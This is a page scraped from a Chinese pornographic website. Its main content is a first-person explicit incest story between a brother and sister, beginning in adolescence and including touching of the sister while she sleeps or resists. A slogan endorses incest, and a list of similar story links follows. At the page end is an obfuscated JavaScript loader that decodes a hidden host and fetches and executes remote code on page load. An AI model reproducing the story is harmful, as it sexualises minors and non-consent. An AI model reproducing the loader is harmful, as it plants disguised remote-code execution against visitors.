返回

我有过乱伦925

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



大家一定记住这句真理: “只要是双方自愿的,两个互相有性欲的人发生性关系没有任何不道德~!”
乱伦这个话题,是我多年心里的秘密。对于熟悉的人我是绝对不会说出来的,无论是谁。我不敢想象说出它的后果。如今听到乱伦这个字眼,我就故作镇静,不动声色,其实心里胆战心惊。做为有此经历的当事人,只有在这里将心里的阴暗秘密说出来吧:我今年25岁,来自一个内地的城市普通的中产家庭,故事就发生在我和我的姐姐之间。
她和我年纪相近,只大我一岁多,小时候的感情就不错,亲密无间一起玩耍就不多提了。第一次的罪恶沖动是因为青春期的沖动,和家庭的环境也有关,那时我家住公司的院落职工楼,我家住5楼,面积不大。第一次是发生在我读高一那年的夏天暑假,夏天我们在家穿着也比较暴露,我经常是一条短裤在家,姐在家一般也是小西裤加背心,更多的时候午睡时是就是穿一条小内裤在家,应该说是姐姐睡时漂亮的屁股引起了我的非分之想,引发了过来的沖动。那天下午我和她在家,看电视看累了就睡,侧身睡地板上,我的眼睛又是盯着她的屁股看,它诱惑了我。一条小内裤深深的陷在两边屁股沟中,白花花的肉感,我就睡在她的旁边,心里好沖动罪恶的沖动。整个事件的开端就是我的那双手。
我向自己的亲姐姐伸出了手….我的手在发抖屏住呼吸,心跳得好快我可以听见自己的心跳,脑里一阵空白,轻轻的将手放在她的屁屁上,她没醒来,越兴奋越胆大,我真的听见自己的心一下一下的冬冬响,那种感觉真的无发言表,后来我与女友恋爱第一次也没有如此的程度。我的手指开始慢慢的从内裤的侧边缘探了进去,小心翼翼的,走一步停一一下,矛盾挣扎中,手指忍不住坏起来,手指一邪轻轻的探了进去,轻轻拉起内裤的侧边缘,看见黑黑的阴毛,手指趁势钻了进去,轻轻的摸着阴沟,摸了一会,便大胆起来,将整个的手掌从腰部的内裤上边缘轻轻的探了进去,慢慢的一步一步,经过软软的屁屁,此时我感觉她已经醒了,只是漠不做声怕尴尬,我胆大包天想勾引她,想将整个手探到她的屁沟中去,只是被她压着的半边内裤我手不能完全伸进去,我用力向来将来手挤进去摸,此时姐姐突然翻身起来一把抓到我的手背,指甲好尖在我手背上用力一抓,我的手背破皮一道痕,我忙躲开不说话脸红着,她盯着我恶狠狠的说了句,下次再这样看我怎么收拾你!我自知理亏,忙着躲去了客厅好久没进屋。后来几天我一直观察她没什么异常,也没和爸妈说,不禁放心了些,暑假时间长,那时不是看电视,就是睡,于是姐姐的诱惑始终存在着。
第一次过后,我开始怀念那种感觉,后来一天下午她又在睡,看着她白花花肥肥的屁沟子,我又不顾自责忍不住,鸡鸡涨得很难受硬梆梆的,我也躺下地板睡在她旁边,感到她睡熟了,开始用硬梆梆的鸡救开始靠近屁屁,越来越近,我挺着下身,上身与她保持着距离,鸡鸡轻轻的顶到了她的屁沟中,心里一阵狂爽,心跳得不行,轻轻的一下一下的慢慢的顶着磨,那种感觉想起来至今是莫名的沖动,慢慢的感觉她可能醒了,就停住不动。见她没转身也没出声便大胆起来,想摸胸,手绕到她腰那边找到背心的下摆,手抖着往上搜,一路真空,轻轻的摸到了软软的胸,我的手发抖,罪恶与清欲的放纵在搏斗碰撞出的畸形快感,我轻轻的握住了她的奶子轻轻的揉,此时她醒来我也不会怕了,我尽情的摸着,上身也靠了过去,肘撑着地板,另一只手不停的摸奶子捏乳头,我知道她醒了,她紧闭着眼不出声,这让我更大胆起来,好象受到了默许。我好兴奋竟想到去脱掉她的裤子,当我将裤想拉下来时,姐姐又是突然的翻身坐起来推开我的手,脸红红的,没骂我只是说了句别闹了,看电视吧,我也一下从高峰掉到低谷,好难受,这就是我们乱伦的开端阶段。
有了这次后,后来我经常这么做,只要是只有我们两个在家,我就想法去摸她的胸和下边,变着法的去挑起她的兴趣,她也没怎么拒绝了,最多只是推开我的手继续睡不理我,我知道摸的她也很舒服,因为摸她下身时,她下边有滑滑的水流出来。这样慢慢的发展到后来,即便她没睡,坐在我旁边看电视,看书时,我的手也会不知不觉的从侧边从后面伸过去,想摸就摸,摸到她受不了,就干脆的掀起她的背心摸,有时干脆的楼着她的腰,用力一把压她到身下,滚在一起尽情的将手伸进内裤扣弄,她也会抱着我闭着眼滚来滚去,后来我可以整个的脱下她的内裤尽情的摸,再发展下来,我开始很兴奋的硬梆梆的鸡鸡对着她下边的外阴磨,只是不敢插入,那时我已没什么愧疚感,只是怕怀BB出事,那就彻底完了。幼稚得很。
所以我每次都是磨屁屁和外阴,射在肚上和大腿上,有时射在自己手里,我们小心的保持着控制着底线,就是不插入。只有一次我摸得她受不了太兴奋,她用手指翻开阴唇露出红红的小洞呻吟着要我插进去,我没敢。那时她什么时候月经我都知道,一有机会就摸,她身上的气味我也很熟悉了,只是不喜欢。夏天是我们的多发期,冬天没那么方便,那时我们已分床睡,我是睡沙发床,在一个房间。到晚上就期待着等爸妈睡,那种感觉真的象偷情。爸妈睡得很熟时我就摸上床去,我知道她没睡,从后面抱住她摸,在被子里滚来滚去,有几次还差点露马脚,幸好我们很小心,爸妈也没发现。
有次因为太兴奋在她屁股上磨了几下就射了,准备的纸巾也没来得及用上,结果射在了她的大腿上,有些精水留到了床单上有痕让我紧张了一晚,生怕妈妈生疑认出来,最后还好没事,后来就很小心。这样的关系我们保持到了姐姐去外地读书,后来我也去了南京读书,奇怪的是在读书的几年里面我们断了关系,即便放假回家,我们也很自然谈论着自己的爱情,评价着对方的男女朋友,却失去了在一起温存的勇气,我们小心的不去碰那个回忆,我们也长大了,那时我还为这样的往事自责愧疚过,以为一切都已结束了,努力的消除着这件事对我们心理上的影响。
时间过得很快,我也毕业了去了深圳02年时,那时姐姐已在深圳工作了,我刚到就住在了她那里,那时她也与男朋友同居,后来我搬去了公司宿捨,一切都很慢正常,周末去她租的地方看碟啊,一起去小梅沙海边玩啊什么的,都很正常。事情到了去年过年时,那时车票紧,放假时间也不长,我们两个都没回去,那时刚好姐姐和她男朋友分手了是一个人,过年就我们两个一起过了,本来很正常,过年前几天,那天她在洗手间洗澡,洗到一半没有煤气了,偏偏她家里的热水器用煤气且装在里面,叫我搬一灌煤气进去换,我进去里面雾气腾腾的,她披着个浴巾,煤气罐换半天没弄好,她就动手帮我一起换,浴巾不小心掉了一半下来,一对丰满的奶子跳入我的眼睛,她装做没事马上拉好,换好出去。出来后我脑里空白,满是那对白白的奶子,挥之不去,一下熟悉的诱惑又来到我的身边,罪恶的沖动又跳了出来,情欲又一次挑战着理智。
晚上她睡在那边房,我反复难以入眠,那边有个熟悉又陌生的身体在吸引着我,那两天我有点不自然,她也感觉到了,我们努力在保持着距离,理智和情欲在战争着。过年我们一大班同学和朋友以前过的,在一个朋友家里聚餐,过得挺开心。初一晚上我们两个,在客厅看电视看到了很晚,她说自己困了进了房,她穿着贴身的粉红睡衣,屁股更圆了,姐姐比以前成熟了,是个成熟的女人了。
我心跳得很厉害,罪恶的沖动又回来了,晚上很晚了我还在客厅开着电视,其实脑里想的都是怎么进去勾引她做爱。电视开着,我站在门口,姐姐睡在了床上,向里面侧身睡着,光线暗暗的,我想她一定没睡着,我挣扎着,想进去,万一姐姐拒绝了怎么办,那以后怎么面对啊,毕竟我们不是以前的小毛孩了,姐姐丰满的胸和屁屁吸引着我,我下决心进去,我悄悄的脱了外裤,只是留了条长长的那种贴身裤,关了电视,客厅的灯不关,卧室的门半遮半掩,这样我可以看清姐姐的身体,光线又不是很亮,我轻轻的坐了下来,内心挣扎着,终于伸出手轻轻的放在了她的腰部,她没反应,一切又回来了,我的手罪恶着,放肆着,搜索着,挑逗着,我已轻轻的掀开了她的被子紧紧的贴着了姐姐,鸡鸡顶着姐姐下面,手顺着睡衣隔着轻轻的揉撮,心跳得好快,我在等着观察着她的反应,姐姐突然翻身过来一把抱住了我!感觉又回来了!!
我们大声的喘着气滚在了一起,一切都是疯狂的,我是这么的激动,当时我想的就是我终于可以真正的进入姐姐的身体了,褪裤,抚摸,拥抱,鸡鸡顶着下面,姐姐用手扶着鸡鸡送它到洞口,往里一沉一阵温暖柔软的包裹感觉,没有变换姿势,只是男上女下我趴在姐身上,一阵猛抽送,嘴里含着奶头,感受着她的声音呻吟,一切是熟悉的,又是陌生的,只有几分钟的狂热和疯狂,我很快就射了,射在了里面紧紧的顶着不拿出来,过了很久我们都不说话,只是抱着,有些罪恶,有些满足,有些莫名的愧疚。后来她拿开我的手下床去洗手间洗了洗,我懒懒的睡在床上心里想着等下怎么和她说话,姐姐进来只是叫我去沖个凉,我去沖凉出来进房,姐姐说你还是去那边房睡吧,我也没坚持去了另一间房,睡下一晚。第二天两人当做没事发生,白天还是一样的和朋友去吃饭,去唱歌什么的,到了晚上我就关灯摸过去爬上她的床和她做爱。那几晚我们每晚都做,经常是睡前做2次,半夜醒来做一次,早上醒来做一次,我干脆在每晚她房里过夜,和以往不一样的是,我们经过这么多年,都谈过恋爱有过男女朋友,也有很多的性经验,做起来也是很大胆,我们换着各种的姿势做,站着,趴着,开着灯,关着灯,不过我想亲她下身的时候,她坚决的拒绝了,也不给我口交,我也不提这事。
后来几天快上班那段时间,我们白天也会睡在床上不下床,看影碟看三级片,看得想了就做,疯狂得很。就这样过了年,我女朋友从老家回来后,我们偷着做的机会就少多了,我女朋友查得我很严,整天粘着我,但我一有机会就会去姐姐家,只要是只有我们两人在家,我就会要,有时我去时,她还在厨房忙,我也会从后面抱住她来个暴风雨,我女友也只当我去了姐姐家根本想不到这些,这样我们偷着有很长一段时间,到了8月时姐交了个新男朋友,不久两人就住在了一起,至从她交男友后,我的机会就少了,我去得也少,有几次她也不是很愿意,要求断了这样不正常的事。因为我有女友,有性生活,也感觉对不起女友,也有些怕暴露出事,也有些罪恶感愧疚,慢慢的越来越少,到了今年3月我姐和那个福建的男朋友订婚后,我再也没有和姐有过了,我们努力的选择着慢慢遗忘,做为乱伦的当事者,我不知道倒底我们做的事是不是罪恶还是情有可愿,我知道自己是如此的与别人不一样,就是因为这段难以言齿的乱伦。以上是我这么些年的感受经历,一倾为快,绝对真实,给年轻的朋友分享心路,我觉得这样的丑事最好还是不要有,带来的心理上的压力和愧疚不知道在哪天总会爆发出来,引以为戒!


评分
相关推荐
3.0分

3.0分 我有过乱伦-乱伦小说188

3.0分

3.0分 我看过的最真实的乱伦6a9

3.0分

3.0分 【我看过妈妈的裸照】-乱伦小说c72

3.0分

3.0分 [我的乱伦自白](乱伦自白)-乱伦小说79c

3.0分

3.0分 我的乱伦428

3.0分

3.0分 我与姐姐乱伦-乱伦小说343

3.0分

3.0分 乱伦深渊妈姐和我伦乱a1f

3.0分

3.0分 和妈妈的乱伦经过37b

3.0分

3.0分 我占有了妈妈和姐姐-乱伦小说ee6

3.0分

3.0分 [被我上过的女人们][第九章][zhlongshen]-乱伦小说17c

3.0分

3.0分 给岳母过生日-乱伦小说329

3.0分

3.0分 表妹也不放过-乱伦小说87b

3.0分

3.0分 我与姐姐乱伦d42

3.0分

3.0分 我的乱伦生涯cee

3.0分

3.0分 我的堂姐我的乱伦86c

3.0分

3.0分 我的堂姐我的乱伦86c


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};